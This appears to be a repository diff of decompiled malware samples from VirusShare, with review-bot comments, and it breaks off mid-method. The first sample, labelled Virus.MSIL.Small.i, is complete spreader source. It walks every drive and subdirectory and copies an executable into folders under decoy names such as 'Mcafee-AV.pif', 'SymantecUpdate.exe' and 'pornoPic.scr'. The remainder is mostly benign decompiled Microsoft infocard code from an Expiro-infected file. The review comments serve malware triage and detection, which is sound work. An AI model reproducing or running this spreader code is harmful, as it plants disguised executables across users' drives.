// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace test.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>test</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>test</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="sex\program.cs" />
<Compile Include="sex\sex.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test", "Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.csproj", "{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: sex.program
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System;
using System.IO;
namespace sex
{
internal static class program
{
[STAThread]
private static void Main()
{
sex.sex sex = new sex.sex();
for (char ch = 'B'; ch <= 'Z'; ++ch)
{
string str = ch.ToString() + ":\\";
if (Directory.Exists(str))
{
try
{
sex.DispEXE(str);
}
catch (Exception ex)
{
}
}
}
}
}
}
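Review bot: Main has no triage annotation and discards every failure in an empty `catch (Exception ex)` block, so a reader has to trace the loop to learn which locations the sample touches. A short header comment would cover it, for example `// Triage: probes volume roots B:\ through Z:\ (A: is skipped) and passes each existing root to sex.DispEXE; exceptions are swallowed, so the sample emits no error output`. That records the scope (every mounted volume, including removable and mapped drives) for anyone writing containment or hunting guidance from this listing.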
@@ -0,0 +1,164 @@
// Decompiled with JetBrains decompiler
// Type: sex.sex
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System;
using System.IO;
using System.Text.RegularExpressions;
namespace sex
{
internal class sex
{
public void DispEXE(string tD)
{
try
{
string[] directories = Directory.GetDirectories(tD);
string[] strArray = new string[38]
{
"own",
"it",
"upl",
"syst",
"set",
"usic",
"efu",
"am",
"caf",
"yma",
"mp3",
"wav",
"ovi",
"roj",
"win",
"ict",
"my",
"ina",
"Shar",
"aza",
"onk",
"mob",
"tart",
"ffic",
"av",
"rack",
"ile",
"W32",
"root",
"assw",
"Sounds",
"ideo",
"rit",
"ist",
"ys",
"orn",
"ew",
"amp"
};
foreach (string input in directories)
{
try
{
foreach (string pattern in strArray)
{
try
{
if (Regex.IsMatch(input, pattern))
{
if (Regex.IsMatch(input, "it"))
File.Copy("windows2006.exe", input + "\\NewWeb.exe");
if (Regex.IsMatch(input, "own"))
File.Copy("windows2006.exe", input + "\\Downloader.pif");
if (Regex.IsMatch(input, "upl"))
File.Copy("windows2006.exe", input + "\\upload-file.exe");
if (Regex.IsMatch(input, "syst"))
File.Copy("windows2006.exe", input + "\\system.dll.cmd");
if (Regex.IsMatch(input, "set"))
File.Copy("windows2006.exe", input + "\\setu.exe");
if (Regex.IsMatch(input, "usic"))
File.Copy("windows2006.exe", input + "\\MyMiusic.exe");
if (Regex.IsMatch(input, "efu"))
File.Copy("windows2006.exe", input + "\\defult-path.cmd");
if (Regex.IsMatch(input, "ame"))
File.Copy("windows2006.exe", input + "\\FunGame.flash.exe");
if (Regex.IsMatch(input, "caf"))
File.Copy("windows2006.exe", input + "\\Mcafee-AV.pif");
if (Regex.IsMatch(input, "ort"))
File.Copy("windows2006.exe", input + "\\PortScanner.exe");
if (Regex.IsMatch(input, "yma"))
File.Copy("windows2006.exe", input + "\\SymantecUpdate.exe");
if (Regex.IsMatch(input, "p3"))
File.Copy("windows2006.exe", input + "\\Mp3Player.pif");
if (Regex.IsMatch(input, "av"))
File.Copy("windows2006.exe", input + "\\WaveToMp32.exe");
if (Regex.IsMatch(input, "ovi"))
File.Copy("windows2006.exe", input + "\\Fun.pif");
if (Regex.IsMatch(input, "win"))
File.Copy("windows2006.exe", input + "\\winUpdate.cab.cmd");
if (Regex.IsMatch(input, "roj"))
File.Copy("windows2006.exe", input + "\\install-project.exe");
if (Regex.IsMatch(input, "ict"))
File.Copy("windows2006.exe", input + "\\mypic.scr");
if (Regex.IsMatch(input, "my"))
File.Copy("windows2006.exe", input + "\\myboy.exe");
if (Regex.IsMatch(input, "ina"))
File.Copy("windows2006.exe", input + "\\NewWinamp.exe");
if (Regex.IsMatch(input, "Shar"))
File.Copy("windows2006.exe", input + "\\Perl-install.pif");
if (Regex.IsMatch(input, "aza"))
File.Copy("windows2006.exe", input + "\\Learning.exe");
if (Regex.IsMatch(input, "mob"))
File.Copy("windows2006.exe", input + "\\mobileAV.exe");
if (Regex.IsMatch(input, "tart"))
File.Copy("windows2006.exe", input + "\\WinUser32.dll.exe");
if (Regex.IsMatch(input, "ffic"))
File.Copy("windows2006.exe", input + "\\newOffice.exe");
if (Regex.IsMatch(input, "rack"))
File.Copy("windows2006.exe", input + "\\TrackPlayer.exe");
if (Regex.IsMatch(input, "ile"))
File.Copy("windows2006.exe", input + "\\readMe.Txt.pif");
if (Regex.IsMatch(input, "orn"))
File.Copy("windows2006.exe", input + "\\pornoPic.scr");
if (Regex.IsMatch(input, "W32"))
File.Copy("windows2006.exe", input + "\\WinLearning.htm.cmd");
if (Regex.IsMatch(input, "root"))
File.Copy("windows2006.exe", input + "\\DefultRoot.pif");
if (Regex.IsMatch(input, "assw"))
File.Copy("windows2006.exe", input + "\\PasswordFinder.exe");
if (Regex.IsMatch(input, "Sounds"))
File.Copy("windows2006.exe", input + "\\NewSound.cmd");
if (Regex.IsMatch(input, "ideo"))
File.Copy("windows2006.exe", input + "\\0110Video.pif");
if (Regex.IsMatch(input, "rit"))
File.Copy("windows2006.exe", input + "\\CDWriter.exe");
if (Regex.IsMatch(input, "ist"))
File.Copy("windows2006.exe", input + "\\NewList.exe");
if (Regex.IsMatch(input, "ys"))
File.Copy("windows2006.exe", input + "\\Secure.exe");
if (Regex.IsMatch(input, "ew"))
File.Copy("windows2006.exe", input + "\\newFile.pif");
if (Regex.IsMatch(input, "amp"))
File.Copy("windows2006.exe", input + "\\NewWinamp.exe");
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
foreach (string directory in Directory.GetDirectories(tD))
this.DispEXE(directory);
}
catch (Exception ex)
{
}
}
}
}
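Review bot: DispEXE is committed without a triage annotation, and its on-disk footprint is hard to read off the 38-entry `strArray` and the long `if` chain. A header comment should state that it recurses through every subdirectory of `tD`, tests each array entry as a case-sensitive regex against the full directory path, and copies `windows2006.exe` (a relative path, so resolved against the process working directory) into matching directories under the decoy names in the `File.Copy` calls, with `.exe`, `.pif`, `.scr` and `.cmd` extensions. The array and the chain do not line up (`am` vs `ame`, `mp3` vs `p3`, `onk` is listed but never tested, `ort` is tested but not listed), and every exception is swallowed. Which decoy names appear in a given directory can therefore vary, and detection content should match on any of the names rather than on the complete set.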
@@ -0,0 +1,22 @@
using System;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: SatelliteContractVersion("3.0.0.0")]
[assembly: AssemblyFileVersion("3.0.4506.2152")]
[assembly: AssemblyCopyright("© Microsoft Corporation. All rights reserved.")]
[assembly: NeutralResourcesLanguage("en-US")]
[assembly: AssemblyInformationalVersion("3.0.4506.2152")]
[assembly: ComVisible(false)]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDefaultAlias("infocard.exe")]
[assembly: AssemblyDescription("infocard.exe")]
[assembly: AssemblyTitle("infocard.exe")]
[assembly: CLSCompliant(false)]
[assembly: AssemblyProduct("Microsoft® .NET Framework")]
[assembly: AssemblyKeyFile("f:\\dd\\Tools\\devdiv\\EcmaPublicKey.snk")]
[assembly: AssemblyDelaySign(true)]
[assembly: AssemblyVersion("3.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: BrowserNavConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum BrowserNavConstants
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CallMode
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CallMode
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CommandStateChangeConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CommandStateChangeConstants
{
}
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HDC__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[NativeCppClass]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HDC__
{
}
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HINSTANCE__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HINSTANCE__
{
}
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HWND__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[DebugInfoInPDB]
[NativeCppClass]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HWND__
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IGNOREMIME
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum IGNOREMIME
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMAGE_AUX_SYMBOL_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMAGE_AUX_SYMBOL_TYPE
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_NAME_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMPORT_OBJECT_NAME_TYPE
{
}
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(64)]
internal enum IMPORT_OBJECT_TYPE
{
}
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityApplicationManager
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityApplicationManager
{
private const int WindowsVistaMajorVersion = 6;
private IAccessibilityHelper m_helper;
public AccessibilityApplicationManager()
{
bool fTabletPC = 0 != NativeMethods.GetSystemMetrics(86);
if (Environment.OSVersion.Version.Major < 6)
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForXpWin2k3(fTabletPC);
else
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForVista(fTabletPC);
}
public void Stop() => this.m_helper.Stop();
public void RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
this.m_helper.RestartOnInfoCardDesktop(userATApplicationFlags, hTrustedUserToken, ref trustedUserSid, infocardDesktop, userSessionId, userProcessId, userIdentity);
}
public bool RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
return this.m_helper.RestartOnUsersDesktop(userProcessId, userDesktop, userIdentity);
}
}
}
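Review bot: The constructor uses bare literals where names would carry the meaning: `NativeMethods.GetSystemMetrics(86)` and `Environment.OSVersion.Version.Major < 6`, even though `WindowsVistaMajorVersion` is declared on the line above and never referenced. I would add `private const int SM_TABLETPC = 86;` and write the comparison as `Environment.OSVersion.Version.Major < WindowsVistaMajorVersion`. The inlined constant is probably a decompiler artefact, but as committed the OS and tablet checks read as magic numbers.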
@@ -0,0 +1,124 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForVista
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForVista : IAccessibilityHelper, IDisposable
{
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string progfilePath = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles);
private static readonly string baseATPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs";
private static readonly string configPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session";
private List<string> m_applicationList = new List<string>();
private ProcessManager m_manager;
private bool m_fResetConfigKey;
private int m_sessionId;
private bool m_fTabletPC;
public AccessibilityHelperForVista(bool fTabletPC)
{
this.m_fTabletPC = fTabletPC;
this.InitializeATAppData();
}
private void InitializeATAppData()
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.baseATPath);
foreach (string subKeyName in registryKey.GetSubKeyNames())
{
string str = (string) registryKey.OpenSubKey(subKeyName).GetValue("ATExe");
if (!string.IsNullOrEmpty(str))
this.m_applicationList.Add(str);
}
}
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
if (!this.m_fResetConfigKey)
return false;
Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.configPath + (object) this.m_sessionId, true).SetValue("Configuration", (object) "");
this.m_fResetConfigKey = false;
return true;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_fResetConfigKey = false;
this.m_sessionId = userSessionId;
string str = userIdentity.User.Value;
for (int index = 0; index < this.m_applicationList.Count; ++index)
{
string application = this.m_applicationList[index];
Process[] processesByName = Process.GetProcessesByName(application.Substring(0, application.LastIndexOf('.')));
if (processesByName != null)
{
foreach (Process p in processesByName)
{
if (userSessionId == p.SessionId)
{
this.m_fResetConfigKey = true;
if (!Utility.KillHelper(p))
break;
break;
}
}
}
}
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
string fullPath1 = Path.Combine(AccessibilityHelperForVista.systemPath, "AtBroker.exe");
if (userATApplicationFlags != 0U)
{
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath1, "", fUseElevatedToken);
}
if (!this.m_fTabletPC)
return;
string fullPath2 = Path.Combine(AccessibilityHelperForVista.progfilePath, "microsoft shared\\ink\\tabtip.exe");
bool fUseElevatedToken1 = true;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath2, "/SeekDesktop:", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
}
}
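Review bot: In RestartOnInfoCardDesktop the process name comes from `application.Substring(0, application.LastIndexOf('.'))`, which throws ArgumentOutOfRangeException when an `ATExe` registry value has no extension, and that happens inside the `using (new SystemIdentity(false))` block. A guarded form such as `int dot = application.LastIndexOf('.'); string name = dot > 0 ? application.Substring(0, dot) : application;` avoids it. InitializeATAppData is fragile in the same way: neither `OpenSubKey` result is checked for null or disposed, and the `(string)` cast assumes `ATExe` is always a string value. Because the constructor calls it, one malformed entry under the ATs key makes construction fail. RestartOnUsersDesktop likewise dereferences the writable `OpenSubKey(..., true)` result without a null check.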
@@ -0,0 +1,169 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForXpWin2k3
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForXpWin2k3 : IAccessibilityHelper, IDisposable
{
private const int OSKIndex = 0;
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string baseRegistryPath = "\\SOFTWARE\\Microsoft\\Utility Manager\\";
private static readonly string keyName = "Start on locked desktop";
internal static AccessibilityHelperForXpWin2k3.DownlevelAtData[] atApplications = new AccessibilityHelperForXpWin2k3.DownlevelAtData[3]
{
new AccessibilityHelperForXpWin2k3.DownlevelAtData("On-Screen Keyboard", "osk.exe", "msswchx"),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Magnifier", "magnify.exe", (string) null),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Narrator", "narrator.exe", (string) null)
};
private List<int> m_restartList = new List<int>();
private ProcessManager m_manager;
private bool m_fTabletPC;
public AccessibilityHelperForXpWin2k3(bool fTabletPC) => this.m_fTabletPC = fTabletPC;
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
using (new SystemIdentity(false))
{
foreach (int restart in this.m_restartList)
{
string application = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[restart].Image);
int pid = 0;
int userHelperWrapper = (int) NativeMcppMethods.CreateProcessAsUserHelperWrapper(application, "", userProcessId, userDesktop, userIdentity.Name, ref pid);
}
}
this.m_restartList.Clear();
return false;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint ATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_restartList.Clear();
bool flag1 = false;
string str = userIdentity.User.Value;
for (int index = 0; index < AccessibilityHelperForXpWin2k3.atApplications.Length; ++index)
{
using (RegistryKey registryKey = Registry.Users.OpenSubKey(str + AccessibilityHelperForXpWin2k3.baseRegistryPath + AccessibilityHelperForXpWin2k3.atApplications[index].RegistryPath))
{
bool flag2 = false;
int? nullable1 = new int?();
if (registryKey != null && RegistryValueKind.DWord == registryKey.GetValueKind(AccessibilityHelperForXpWin2k3.keyName))
nullable1 = new int?((int) registryKey.GetValue(AccessibilityHelperForXpWin2k3.keyName));
if (nullable1.HasValue)
{
int? nullable2 = nullable1;
if ((1 != nullable2.GetValueOrDefault() ? 0 : (nullable2.HasValue ? 1 : 0)) != 0)
goto label_9;
}
if (this.m_fTabletPC)
{
if (index != 0)
continue;
}
else
continue;
label_9:
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].Image.Substring(0, AccessibilityHelperForXpWin2k3.atApplications[index].Image.LastIndexOf('.'))))
{
flag2 = false;
if (userSessionId == p.SessionId)
{
flag2 = true;
this.m_restartList.Add(index);
if (!Utility.KillHelper(p))
break;
break;
}
}
if (flag2 && AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage != null)
{
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage))
{
if (userSessionId == p.SessionId && Utility.KillHelper(p))
break;
}
}
if (nullable1.HasValue)
{
int? nullable3 = nullable1;
if ((1 != nullable3.GetValueOrDefault() ? 0 : (nullable3.HasValue ? 1 : 0)) != 0)
{
if (ATApplicationFlags != 0U)
{
string fullPath = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[index].Image);
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath, "", fUseElevatedToken);
if (index == 0)
flag1 = true;
}
}
}
}
}
if (!this.m_fTabletPC || flag1)
return;
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken1 = false;
